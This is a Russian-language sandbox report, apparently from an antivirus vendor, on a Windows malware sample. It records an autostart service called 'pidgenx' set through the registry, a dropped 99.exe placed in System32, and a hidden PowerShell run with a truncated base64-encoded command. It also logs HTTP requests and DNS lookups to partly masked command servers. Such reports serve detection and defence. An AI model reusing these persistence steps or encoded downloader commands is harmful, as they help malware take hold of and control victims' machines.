Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\pidgenx] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pidgenx] 'ImagePath' = '"<SYSTEM32>\defaultlocationcpl\pidgenx.exe"'
Создает следующие сервисы
- 'pidgenx' "<SYSTEM32>\defaultlocationcpl\pidgenx.exe"
- 'pidgenx' <SYSTEM32>\defaultlocationcpl\pidgenx.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\99.exe
Удаляет следующие файлы
- <SYSTEM32>\defaultlocationcpl\pidgenx.exe
Перемещает следующие файлы
- %HOMEPATH%\99.exe в <SYSTEM32>\defaultlocationcpl\pidgenx.exe
Сетевая активность
Подключается к
- '20#.#12.78.182':80
- '74.##7.230.187':8080
TCP
Запросы HTTP GET
- http://st####rsecurity.com/wp-includes/PTyoVOEIY/
Запросы HTTP POST
- http://74.###.230.187:8080/9EGDKEmIjMJFV/C5JKqVnxcy7n30qm/ via 74.##7.230.187
UDP
- DNS ASK sc####na.education
- DNS ASK ma##i.site
- DNS ASK ma##.work
- DNS ASK bl##.##ngjieyuan.com
- DNS ASK st####rsecurity.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\99.exe'
- '<SYSTEM32>\defaultlocationcpl\pidgenx.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...' (со скрытым окном)
